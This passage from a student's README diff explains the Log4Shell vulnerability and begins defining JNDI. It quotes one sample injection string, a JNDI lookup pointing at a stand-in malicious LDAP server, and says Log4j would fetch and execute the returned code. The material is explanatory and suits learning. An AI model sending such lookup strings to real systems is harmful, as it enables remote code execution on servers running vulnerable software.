Nizuii/Week-8/Log4j-README.md

 User: ${jndi:ldap://malicious-server.com/payload}
 ```
 Log4j wouldn't treat this as text.
 It would interpret it and actually make a network request to the attackers server and executes whatever code it recieved.

+## What is JNDI?
+- JNDI stands for **Java Naming & Directory Interface**.
+- A system to fetch:
+  - Data
+  - Objects
+  - Configurations